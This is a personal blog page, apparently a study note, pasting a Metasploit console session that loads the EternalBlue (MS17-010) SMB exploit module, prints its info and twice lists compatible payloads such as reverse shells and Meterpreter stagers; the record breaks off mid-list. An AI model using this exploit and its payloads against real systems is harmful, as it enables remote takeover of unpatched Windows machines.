<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>forget a msfconsole using | josyaaa</title>
  <meta name="author" content="josyaaa">
  
  <meta name="description" content="(㉿172)-[~]└─$ msfconsole  
  .:okOOOkdc&amp;#39;           &amp;#39;cdkOOOko:.
.xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.

   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOO">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="forget a msfconsole using"/>
  <meta property="og:site_name" content="josyaaa"/>

  
    <meta property="og:image" content=""/>
  

  
  
    <link href="/josyaaa/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/josyaaa/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/josyaaa/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/josyaaa/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/josyaaa/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/josyaaa/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/josyaaa/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/josyaaa/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  



<meta name="generator" content="Hexo 6.2.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/josyaaa/">josyaaa</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/josyaaa/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/josyaaa/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/josyaaa/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/josyaaa/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> forget a msfconsole using</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <p>(㉿172)-[~]<br>└─$ msfconsole  </p>
<pre><code>  .:okOOOkdc&#39;           &#39;cdkOOOko:.
.xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
</code></pre>
<p>   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:<br>  ‘OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO’<br>  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo<br>  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx<br>  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl<br>  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.<br>   cOOOOOOO.MMM.OOc.MMMMM’oOO.MMM,OOOOOOOc<br>    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo<br>     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl<br>      ;OOOO’MMM.OOOO.MMM:OOOO.MMM;OOOO;<br>       .dOOo’WM.OOOOocccxOOOO.MX’xOOd.<br>         ,kOl’M.OOOOOOOOOOOOO.M’dOk,<br>           :kk;.OOOOOOOOOOOOO.;Ok:<br>             ;kOOOOOOOOOOOOOOOk:<br>               ,xOOOOOOOOOOOx,<br>                 .lOOOOOOOl.<br>                    ,dOd,<br>                      .                                       </p>
<pre><code>   =[ metasploit v6.1.31-dev                          ]
</code></pre>
<ul>
<li>– –&#x3D;[ 2201 exploits - 1166 auxiliary - 395 post       ]</li>
<li>– –&#x3D;[ 600 payloads - 45 encoders - 11 nops            ]</li>
<li>– –&#x3D;[ 9 evasion                                       ]</li>
</ul>
<p>Metasploit tip: View all productivity tips with the<br>tips command</p>
<p>msf6 &gt; use exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue<br>[*] No payload configured, defaulting to windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp<br>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt; info</p>
<pre><code>   Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
 Module: exploit/windows/smb/ms17_010_eternalblue
</code></pre>
<p>   Platform: Windows<br>       Arch: x64<br> Privileged: Yes<br>    License: Metasploit Framework License (BSD)<br>       Rank: Average<br>  Disclosed: 2017-03-14</p>
<p>Provided by:<br>  Equation Group<br>  Shadow Brokers<br>  sleepya<br>  Sean Dillon <a href="mailto:&#x73;&#101;&#97;&#110;&#x2e;&#100;&#105;&#x6c;&#108;&#x6f;&#110;&#x40;&#x72;&#x69;&#115;&#x6b;&#x73;&#x65;&#x6e;&#115;&#x65;&#x2e;&#x63;&#x6f;&#109;">&#x73;&#101;&#97;&#110;&#x2e;&#100;&#105;&#x6c;&#108;&#x6f;&#110;&#x40;&#x72;&#x69;&#115;&#x6b;&#x73;&#x65;&#x6e;&#115;&#x65;&#x2e;&#x63;&#x6f;&#109;</a><br>  Dylan Davis <a href="mailto:&#x64;&#x79;&#108;&#97;&#x6e;&#x2e;&#x64;&#97;&#118;&#x69;&#115;&#64;&#x72;&#x69;&#x73;&#107;&#x73;&#x65;&#110;&#115;&#101;&#46;&#x63;&#x6f;&#x6d;">&#x64;&#x79;&#108;&#97;&#x6e;&#x2e;&#x64;&#97;&#118;&#x69;&#115;&#64;&#x72;&#x69;&#x73;&#107;&#x73;&#x65;&#110;&#115;&#101;&#46;&#x63;&#x6f;&#x6d;</a><br>  thelightcosine<br>  wvu <a href="mailto:&#x77;&#118;&#117;&#64;&#109;&#101;&#116;&#97;&#x73;&#112;&#108;&#x6f;&#x69;&#116;&#x2e;&#x63;&#x6f;&#x6d;">&#x77;&#118;&#117;&#64;&#109;&#101;&#116;&#97;&#x73;&#112;&#108;&#x6f;&#x69;&#116;&#x2e;&#x63;&#x6f;&#x6d;</a><br>  agalway-r7<br>  cdelafuente-r7<br>  cdelafuente-r7<br>  agalway-r7</p>
<p>Available targets:<br>  Id  Name</p>
<hr>
<p>  0   Automatic Target<br>  1   Windows 7<br>  2   Windows Embedded Standard 7<br>  3   Windows Server 2008 R2<br>  4   Windows 8<br>  5   Windows 8.1<br>  6   Windows Server 2012<br>  7   Windows 10 Pro<br>  8   Windows 10 Enterprise Evaluation</p>
<p>Check supported:<br>  Yes</p>
<p>Basic options:<br>  Name           Current Setti  Required  Description<br>                 ng</p>
<hr>
<p>  RHOSTS                        yes       The target host(s)<br>                                          , see <a target="_blank" rel="noopener" href="https://gith/">https://gith</a><br>                                          ub.com&#x2F;rapid7&#x2F;meta<br>                                          sploit-framework&#x2F;w<br>                                          iki&#x2F;Using-Metasplo<br>                                          it<br>  RPORT          445            yes       The target port (T<br>                                          CP)<br>  SMBDomain                     no        (Optional) The Win<br>                                          dows domain to use<br>                                           for authenticatio<br>                                          n. Only affects Wi<br>                                          ndows Server 2008<br>                                          R2, Windows 7, Win<br>                                          dows Embedded Stan<br>                                          dard 7 target mach<br>                                          ines.<br>  SMBPass                       no        (Optional) The pas<br>                                          sword for the spec<br>                                          ified username<br>  SMBUser                       no        (Optional) The use<br>                                          rname to authentic<br>                                          ate as<br>  VERIFY_ARCH    true           yes       Check if remote ar<br>                                          chitecture matches<br>                                           exploit Target. O<br>                                          nly affects Window<br>                                          s Server 2008 R2,<br>                                          Windows 7, Windows<br>                                           Embedded Standard<br>                                           7 target machines<br>                                          .<br>  VERIFY_TARGET  true           yes       Check if remote OS<br>                                           matches exploit T<br>                                          arget. Only affect<br>                                          s Windows Server 2<br>                                          008 R2, Windows 7,<br>                                           Windows Embedded<br>                                          Standard 7 target<br>                                          machines.</p>
<p>Payload information:<br>  Space: 2000</p>
<p>Description:<br>  This module is a port of the Equation Group ETERNALBLUE exploit,<br>  part of the FuzzBunch toolkit released by Shadow Brokers. There is a<br>  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is<br>  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error<br>  where a DWORD is subtracted into a WORD. The kernel pool is groomed<br>  so that overflow is well laid-out to overwrite an SMBv1 buffer.<br>  Actual RIP hijack is later completed in<br>  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may<br>  not trigger 100% of the time, and should be run continuously until<br>  triggered. It seems like the pool will get hot streaks and need a<br>  cool down period before the shells rain in again. The module will<br>  attempt to use Anonymous login, by default, to authenticate to<br>  perform the exploit. If the user supplies credentials in the<br>  SMBUser, SMBPass, and SMBDomain options it will use those instead.<br>  On some systems, this module may cause system instability and<br>  crashes, such as a BSOD or a reboot. This may be more likely with<br>  some payloads.</p>
<p>References:<br>  <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010">https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010</a><br>  <a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2017-0143">https://nvd.nist.gov/vuln/detail/CVE-2017-0143</a><br>  <a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2017-0144">https://nvd.nist.gov/vuln/detail/CVE-2017-0144</a><br>  <a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2017-0145">https://nvd.nist.gov/vuln/detail/CVE-2017-0145</a><br>  <a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2017-0146">https://nvd.nist.gov/vuln/detail/CVE-2017-0146</a><br>  <a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2017-0147">https://nvd.nist.gov/vuln/detail/CVE-2017-0147</a><br>  <a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2017-0148">https://nvd.nist.gov/vuln/detail/CVE-2017-0148</a><br>  <a href="https://github.com/RiskSense-Ops/MS17-010">https://github.com/RiskSense-Ops/MS17-010</a><br>  <a target="_blank" rel="noopener" href="https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf">https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf</a><br>  <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/42030">https://www.exploit-db.com/exploits/42030</a></p>
<p>Also known as:<br>  ETERNALBLUE</p>
<p>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt; show payloads<br>Compatible Payloads<br>&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</p>
<h1 id="Name-Disclosure-Date-Rank-Check-Description"><a href="#Name-Disclosure-Date-Rank-Check-Description" class="headerlink" title="Name                                                Disclosure Date  Rank    Check  Description"></a>Name                                                Disclosure Date  Rank    Check  Description</h1><hr>
<p>   0   payload&#x2F;generic&#x2F;custom                                               normal  No     Custom Payload<br>   1   payload&#x2F;generic&#x2F;shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline<br>   2   payload&#x2F;generic&#x2F;shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline<br>   3   payload&#x2F;generic&#x2F;ssh&#x2F;interact                                         normal  No     Interact with Established SSH Connection<br>   4   payload&#x2F;windows&#x2F;x64&#x2F;exec                                             normal  No     Windows x64 Execute Command<br>   5   payload&#x2F;windows&#x2F;x64&#x2F;loadlibrary                                      normal  No     Windows x64 LoadLibrary Path<br>   6   payload&#x2F;windows&#x2F;x64&#x2F;messagebox                                       normal  No     Windows MessageBox x64<br>   7   payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager<br>   8   payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support<br>   9   payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager<br>   10  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager<br>   11  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)<br>   12  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)<br>   13  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)<br>   14  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)<br>   15  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager<br>   16  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager<br>   17  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)<br>   18  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)<br>   19  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)<br>   20  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)<br>   21  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager<br>   22  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support<br>   23  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager<br>   24  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager<br>   25  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)<br>   26  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)<br>   27  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager<br>   28  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager<br>   29  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)<br>   30  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)<br>   31  payload&#x2F;windows&#x2F;x64&#x2F;pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline<br>   32  payload&#x2F;windows&#x2F;x64&#x2F;powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP<br>   33  payload&#x2F;windows&#x2F;x64&#x2F;powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP<br>   34  payload&#x2F;windows&#x2F;x64&#x2F;powershell_reverse_tcp_ssl                       normal  No     Windows Interactive Powershell Session, Reverse TCP SSL<br>   35  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager<br>   36  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support<br>   37  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager<br>   38  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager<br>   39  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)<br>   40  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)<br>   41  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager<br>   42  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)<br>   43  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)<br>   44  payload&#x2F;windows&#x2F;x64&#x2F;shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline<br>   45  payload&#x2F;windows&#x2F;x64&#x2F;shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline<br>   46  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager<br>   47  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support<br>   48  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager<br>   49  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager<br>   50  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)<br>   51  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)<br>   52  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)<br>   53  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)<br>   54  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager<br>   55  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)<br>   56  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)<br>   57  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)<br>   58  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)</p>
<p>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt; set payload gengrice&#x2F;shell_reverse_tcp<br>[-] The value specified for payload is not valid.<br>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt; show payloads<br>Compatible Payloads<br>&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</p>
<h1 id="Name-Disclosure-Date-Rank-Check-Description-1"><a href="#Name-Disclosure-Date-Rank-Check-Description-1" class="headerlink" title="Name                                                Disclosure Date  Rank    Check  Description"></a>Name                                                Disclosure Date  Rank    Check  Description</h1><hr>
<p>   0   payload&#x2F;generic&#x2F;custom                                               normal  No     Custom Payload<br>   1   payload&#x2F;generic&#x2F;shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline<br>   2   payload&#x2F;generic&#x2F;shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline<br>   3   payload&#x2F;generic&#x2F;ssh&#x2F;interact                                         normal  No     Interact with Established SSH Connection<br>   4   payload&#x2F;windows&#x2F;x64&#x2F;exec                                             normal  No     Windows x64 Execute Command<br>   5   payload&#x2F;windows&#x2F;x64&#x2F;loadlibrary                                      normal  No     Windows x64 LoadLibrary Path<br>   6   payload&#x2F;windows&#x2F;x64&#x2F;messagebox                                       normal  No     Windows MessageBox x64<br>   7   payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager<br>   8   payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support<br>   9   payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager<br>   10  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager<br>   11  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)<br>   12  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)<br>   13  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)<br>   14  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)<br>   15  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager<br>   16  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager<br>   17  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)<br>   18  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)<br>   19  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)<br>   20  payload&#x2F;windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)<br>   21  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager<br>   22  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support<br>   23  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager<br>   24  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager<br>   25  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)<br>   26  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)<br>   27  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager<br>   28  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager<br>   29  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)<br>   30  payload&#x2F;windows&#x2F;x64&#x2F;peinject&#x2F;reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)<br>   31  payload&#x2F;windows&#x2F;x64&#x2F;pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline<br>   32  payload&#x2F;windows&#x2F;x64&#x2F;powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP<br>   33  payload&#x2F;windows&#x2F;x64&#x2F;powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP<br>   34  payload&#x2F;windows&#x2F;x64&#x2F;powershell_reverse_tcp_ssl                       normal  No     Windows Interactive Powershell Session, Reverse TCP SSL<br>   35  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager<br>   36  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support<br>   37  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager<br>   38  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager<br>   39  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)<br>   40  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)<br>   41  